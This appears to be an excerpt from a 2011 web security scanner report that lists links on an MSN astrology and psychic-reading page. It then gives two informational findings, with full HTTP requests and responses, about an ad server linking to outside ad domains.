<meta http-equiv="PICS-Label" content='(pics-1.0 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "Microsoft Network" on "1996.04.16T08:15-0500" r (n 0 s 0 v 0 l 0))'>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.astrocenter.com/us/js/center-horoscope.js"></script>
...[SNIP]...
</div>
           <img src="http://www.astrocenter.com/us/images/PE.png" align="center"><br>
...[SNIP]...
<li><a href="http://video.msnbc.com/">Video</a>
...[SNIP]...
<li class="c3">
                                   <a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li class="first"><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li>
       <a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li>
       <a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li>
       <a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li>
       <a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li>
       <a href="http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li>
       <a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo">
                               <a href="http://www.bing.com/search?FORM=A18">Bing</a>
...[SNIP]...
<li id="msg" class="last"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search?form=A18">Search the web</a>
...[SNIP]...
</strong>
                       <a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div>
<img src="http://msnportalastrology.112.2O7.net/b/ss/msnportalastrology/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="special" ><a class="special" href=http://www.astrocenter.com/msn/HPChartsAndReports.aspx?Af=-1000>Charts & Reports</a>
...[SNIP]...
<li ><a href=http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000>PsychicCenter</a>
...[SNIP]...
<a href="javascript:centeredPopup('popup/WhatsIncluded.aspx', 470, 330, 'scrollbars=0,status=0,toolbar=0,location=0');"><img src="http://www.astrocenter.com/us/images/info.gif" align="absmiddle" style="display:inline;width:11px;height:11px" border="0" alt="More Information about Personalized Horoscopes"></a>
...[SNIP]...
<div class="unpDottedLine"><img src="http://www.astrocenter.com/us/images/spacer.gif" width="296" height="1" border="0" title="" alt=""></div>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=0&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_0.png" alt="Aries" title="Aries" border="0">Aries</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=1&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_1.png" alt="Taurus" title="Taurus" border="0">Taurus</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=2&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_2.png" alt="Gemini" title="Gemini" border="0">Gemini</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=3&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_3.png" alt="Cancer" title="Cancer" border="0">Cancer</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=4&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_4.png" alt="Leo" title="Leo" border="0">Leo</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=5&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_5.png" alt="Virgo" title="Virgo" border="0">Virgo</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=6&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_6.png" alt="Libra" title="Libra" border="0">Libra</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=7&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_7.png" alt="Scorpio" title="Scorpio" border="0">Scorpio</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=8&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_8.png" alt="Sagittarius" title="Sagittarius" border="0">Sagittarius</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=9&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_9.png" alt="Capricorn" title="Capricorn" border="0">Capricorn</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=10&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_10.png" alt="Aquarius" title="Aquarius" border="0">Aquarius</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=11&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_11.png" alt="Pisces" title="Pisces" border="0">Pisces</a>
...[SNIP]...
<h2><a class="moduleTitleViolet" style="font-size:11px;" href="http://www.astrocenter.com/msn/HPChartsAndReports.aspx?Af=-1000">What's New</a>
...[SNIP]...
<div style="padding:5px 10px 5px 10px">This website is <a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" target="adobeUpgrade"><u>even better</u></a> with the latest version of Adobe Flash Player. Plus, it's FREE. Get it <a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" target="adobeUpgrade"><u>
...[SNIP]...
<noscript>
   <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="302" height="337" id="m5L2" align="middle">
   <param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/DeptLove.aspx?Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/icon_love.png" class="icn" title="Love Horoscopes" alt="Love Horoscopes"></a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/DeptNumerology.aspx?Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/icon_numerology.png" class="icn" title="Numerology" alt="Numerology"></a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/DeptTarot.aspx?Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/icon_tarot.png" class="icn" title="Daily Tarot" alt="Daily Tarot"></a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/DeptChin.aspx?Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/icon_Chinese.png" class="icn" title="Chinese Horoscopes" alt="Chinese Horoscopes"></a>
...[SNIP]...
<h2><a class="t8wht" href="http://www.astrocenter.com/msn/HPChartsAndReports.aspx?Af=-1000"><b>
...[SNIP]...
<a href='buyStEdCh2K2.aspx'><img src="http://www.astrocenter.com/us/images/_sh/pict_60/pict_StEdCh2K2_60.png" alt="2011 Chinese Horoscope" title="2011 Chinese Horoscope" width="60" border="0"></a>
...[SNIP]...
<h2><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdTTL&Af=-1000" class="moduleTitle" style="font-size:12px; text-transform:uppercase;">2011 Love Tarot - <font style="color:red;">
...[SNIP]...
<div class="ctrImg1"><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdTTL&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_120/pict_StEdTTL_120.png" width="120" height="120" alt="Stack your deck for love!" title="Stack your deck for love!" border="0"></a></div>
       <div class="standard11" style="text-align:left; height:120px;"><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdTTL&Af=-1000">This 13-card reading illustrates the romantic atmosphere of each month, as well as the end result! With your 2011 Love Tarot Reading, you'll know how to get what you want, whether it's a hot fling or a
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdTTL&Af=-1000">Get your reading »</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/buyStEdMo.aspx?Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_misc/pict_gen_DidYouKnow_90x110.jpg" width="90" height="110" border="0" title="Did You Know? - Your Inner Child and Astrology" alt="Did You Know? - Your Inner Child and Astrology"></a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdAP&Af=-1000">Get your AstroProfile!</a>
...[SNIP]...
<h2><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdVY&Af=-1000" class="moduleTitle" style="font-size:12px; text-transform:uppercase;">2011 Vedic Forecast - <font style="color:red;">
...[SNIP]...
<div class="ctrImg1"><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdVY&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_120/pict_StEdVY_120.png" width="120" height="120" alt="Bring your desires to life!" title="Bring your desires to life!" border="0"></a></div>
       <div class="standard11" style="text-align:left; height:120px;"><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdVY&Af=-1000">Try a unique take on your future! Use the ancient system of Vedic astrology to gain insight with your 2011 Vedic Horoscope! This report takes a holistic approach to integrate your higher, spiritual asp
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdVY&Af=-1000">Get your report »</a>
...[SNIP]...
<a HREF="http://astrocenter.astrology.redacted/msn/ArticleAstrologyHomeV2.aspx?Af=-1000"><img SRC="http://www.astrocenter.com/us/images/Articles/ast_20100125_145.jpg" WIDTH="145" HEIGHT="232" border="1" alt="5 Myths About Love" title="5 Myths About Love"></img>
...[SNIP]...
<h2><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000" class="moduleTitle" style="font-size:12px; text-transform:uppercase;">Love Score</a>
...[SNIP]...
<div class="ctrImg1"><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_120/pict_StEdLS_120.png" width="120" height="120" alt="How do you rate with your mate?" title="How do you rate with your mate?" border="0"></a></div>
       <div class="standard11" style="text-align:left; height:120px;"><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000">This unique synastry report rates your relationship potential based on seven key factors. It's fun, easy-to-read, and accurate. Love isn't logical, but it makes a lot more sense when you know the score
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000">Get your report »</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/HPDream.aspx?Af=-1000#FeaturedDream"><img src="http://www.astrocenter.com/us/images/_sh/pict_120/pict_gen_FeaturedDream_120.png" width="120" height="120" border="0" title="Featured Dream Interpretation" alt="Featured Dream Interpretation"></a>
...[SNIP]...
<h2><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFr2K11&Af=-1000" class="moduleTitle" style="font-size:12px;">In-depth Insight: 2011 Horoscope - <font style="color:red;">
...[SNIP]...
<div class="ctrImg1"><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFr2K11&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_145/pict_StEdFr2K2_145.png" width="145" height="232" alt="" title="" border="0"></a></div>
       <div class="standard11" style="text-align:left;"><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFr2K11&Af=-1000">Get everything you want with your 2011 Horoscope! This year, we're giving you more of what you need to get your happily-ever-after ending! All About You is your must-have base report. Add one of the lo
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFr2K11&Af=-1000">Read More</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFr2k11&Af=-1000" title=""><b>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdCh2k2&Af=-1000" title=""><b>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFrMo&Af=-1000" alt="" title="">February Horoscope</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFrMoRo&Af=-1000" alt="" title="">February LoveScope</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdMW&Af=-1000" alt="" title="">Make a Wish Tarot</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdYN&Af=-1000" alt="" title="">Yes/No Tarot</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdST&Af=-1000" alt="" title="">Soul Mate Tarot</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdKS&Af=-1000" alt="" title="">King Solomon</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdEH&Af=-1000" alt="" title="">Eye of Horus</a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdMLT&Af=-1000" alt="" title="">Magic Love Tarot</a>
...[SNIP]...
</div><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_60/pict_StEdLS_60.png" width="60" height="60" alt="How do you rate with your mate?" title="How do you rate with your mate?" border="0"></a></td>
       <td style="padding-left:10px"><a class="prodTitle" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000">Love Score</a><br><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000">Are you meant for each other? Find out with Love Score - the ultimate fun, easy-to-read, accurate compatibility report!</a>
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000">More</a>
...[SNIP]...
</div><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdRU&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_60/pict_StEdRU_60.png" width="60" height="60" alt="Harness the ancient power of the runes!" title="Harness the ancient power of the runes!" border="0"></a></td>
       <td style="padding-left:10px"><a class="prodTitle" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdRU&Af=-1000">Runecast</a><br><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdRU&Af=-1000">
       Got a question? Ask the Runecast! This easy and fun reading taps into the wisdom of ancient Norse culture.</a>
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdRU&Af=-1000">More</a>
...[SNIP]...
</div><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDST&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_60/pict_STEDST_60.png" width="60" height="60" alt="It takes two to tango..." title="It takes two to tango..." border="0"></a></td>
       <td style="padding-left:10px"><a class="prodTitle" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDST&Af=-1000">Soul Mate Tarot</a><br><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDST&Af=-1000">Be a double agent - get two perspectives of your love relationship to find out how well you mesh with your Soul Mate Tarot!</a>
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=STEDST&Af=-1000">More</a>
...[SNIP]...
<td class="headMod"><a target="phoneSite" href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000"><font color="#0085aa">
...[SNIP]...
<td><a target="phoneSite" href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Theme=Love&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_60/pict_StTy5_Love_60.png" border="0" width="60" height="60" alt="Talk with a Psychic Advisor" title="Get 5 minutes free!"></a></td>
       <td style="padding-left:10px"><a target="phoneSite" href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Theme=Love&Af=-1000" class="prodTitle">Psychic Love Reading</a><br><a target="phoneSite" href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Theme=Love&Af=-1000" class="prodDesc">
       A fabulous complement to any of our love products. Find out what the psychics see for your love future.</a>
...[SNIP]...
<div style="text-align:right;"><a target="phoneSite" href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Theme=Love&Af=-1000" class="prodClick">More</a>
...[SNIP]...
<td class="headMod">What is <a target="phoneSite" class="standardL11" href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000"><b>
...[SNIP]...
</div>
           1-866-MY-ASTRO is Astrocenter's live advice phone service, which is committed to making quality <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic reading</a>
...[SNIP]...
<br>

           Our advisors are highly skilled <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychics</a>
...[SNIP]...
<b>Why <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000" style="color:#FF9944; text-decoration:none">psychic reading</a>
...[SNIP]...
<br>
           Calling a <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic</a> advisor for the first time can be overwhelming. Please see below how you may benefit from a <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic reading</a>
...[SNIP]...
<br>
           When it comes to love, sometimes we need support to keep going. Whether you are used to turn to astrology or the Tarot for advice, or prefer a <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic</a>
...[SNIP]...
<br>
           Feel fenced in to reach your career potential? our advisors have experience in many fields and their goal is to share their insight. Contact an Astrocenter <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic</a> and see what a <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic reading</a>
...[SNIP]...
<b><a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000" style="color:#FF9944; text-decoration:none">Tarot reading</a>
...[SNIP]...
<br>
           <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">A Tarot reading</a>
...[SNIP]...
<br>
           Whatever your particular question or personal situation, there's an Astrocenter <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic</a> to guide you. Some <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychics</a>
...[SNIP]...
</a>. Understand how you can use the powerful influences in your life and experience a <a href="http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000">psychic reading</a>
...[SNIP]...
<br>
   It's FREE! Get it <a href="http://www.adobe.com/" target="adobeUpgrade"><u>
...[SNIP]...
<noscript>
   <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="300" height="250" id="hMod" align="middle">
   <param name="allowScriptAccess" value="always" />
...[SNIP]...
<td><img SRC="http://www.astrocenter.com/us/images/_sh/elements/bulletSq7x7_085299.gif" WIDTH="7" HEIGHT="7" ALT="bullet" TITLE="bullet" BORDER="0"></img>
...[SNIP]...
<td><img SRC="http://www.astrocenter.com/us/images/_sh/elements/bulletSq7x7_085299.gif" WIDTH="7" HEIGHT="7" ALT="bullet" TITLE="bullet" BORDER="0"></img>
...[SNIP]...
<td><img SRC="http://www.astrocenter.com/us/images/_sh/elements/bulletSq7x7_085299.gif" WIDTH="7" HEIGHT="7" ALT="bullet" TITLE="bullet" BORDER="0"></img>
...[SNIP]...
<td><img SRC="http://www.astrocenter.com/us/images/_sh/elements/bulletSq7x7_085299.gif" WIDTH="7" HEIGHT="7" ALT="bullet" TITLE="bullet" BORDER="0"></img>
...[SNIP]...
<td><img SRC="http://www.astrocenter.com/us/images/_sh/elements/bulletSq7x7_085299.gif" WIDTH="7" HEIGHT="7" ALT="bullet" TITLE="bullet" BORDER="0"></img>
...[SNIP]...
<td><a href="http://www.bing.com/search?FORM=A1&q=summer+sandals+2010&src=IE-SearchBox" class="T11TahBk">Search: Summer Sandals</a>
...[SNIP]...
<td width="80" style="padding-left:10px;padding-right:10px;"><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdEm&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_misc/pict_StEdFreeEmailSub_70.png" width="70" height="70" border="0" title="Free Horoscope and Tarot Newsletters" alt="Free Horoscope and Tarot Newsletters"></a>
...[SNIP]...
<td width="80" style="padding-right:5px;padding-top:8px;" valign="top">
           .. <a target=_blank href="http://www.astrocenter.com/us/PrivacyPopup.aspx" class="prodClick" title="Astrocenter's Privacy Policy">Privacy</a>
...[SNIP]...
<div class="afwrapper standard11"><a href="//privacy-policy.truste.com/click-with-confidence/eusafe/en/www.astrocenter.com/seal_s" title="TRUSTe European Safe Harbor certification" target="_blank"><img align="right" style="border: none; margin-top: -10px" src="//privacy-policy.truste.com/certified-seal/eusafe/en/www.astrocenter.com/seal_s.png" alt="TRUSTe European Safe Harbor certification"/></a>
...[SNIP]...
</a> | <a class="standardL11" href="http://www.horoscope.com"><font color=black>
...[SNIP]...
</a> content Copyright 1999-2011 <a class="standardL11" href="http://www.horoscope.com"><font color=black>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...

<script type="text/javascript" src="http://astrocenter.msn.us.intellitxt.com/ast/js/msn/astrocenter.msn_cs.js"></script>
...[SNIP]...

22.42. http://b.rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://b.rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INV4QC&AP=1026

The response contains the following link to another domain:

http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003H/31000000000039414.1?!&&PID=8013955&UIT=G&TargetID=8303500&AN=1510162801&PG=INV4QC&ASID=be19561f6d894cfbb5798e8f4be61980&destination=;ord=1510162801?

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INV4QC&AP=1026 HTTP/1.1
Host: b.rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2798
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8013955-T8303500-C31000000000039414
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:59:06 GMT
Content-Length: 2798

//<![CDATA[
function getRADIds() { return{"adid":"31000000000039414","pid":"8013955","targetid":"8303500"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);if(parent
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_1510162801() {var adCode_1510162801=new Array();adCode_1510162801.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003H/31000000000039414.1?!&&PID=8013955&UIT=G&TargetID=8303500&AN=1510162801&PG=INV4QC&ASID=be19561f6d894cfbb5798e8f4be61980&destination=;ord=1510162801?" WIDTH=120 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_1510162801.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.no_url_specifiedOX2487/B5076164.3;abr=!ie;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http
...[SNIP]...

22.43. http://b.rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://b.rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INV4QC&AP=1026

The response contains the following link to another domain:

http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003H/31000000000039414.1?!&&PID=8013955&UIT=G&TargetID=8303500&AN=439566566&PG=INV4QC&ASID=b03116286f514a64b079940948ad7d98&destination=;ord=439566566?

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INV4QC&AP=1026 HTTP/1.1
Host: b.rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; FC02=FB=AgEAYQ4UwAwC; FC00=FB=AgEAYQ6guQgB; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2781
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8013955-T8303500-C31000000000039414
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 19:28:48 GMT
Content-Length: 2781

//<![CDATA[
function getRADIds() { return{"adid":"31000000000039414","pid":"8013955","targetid":"8303500"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);if(parent
...[SNIP]...
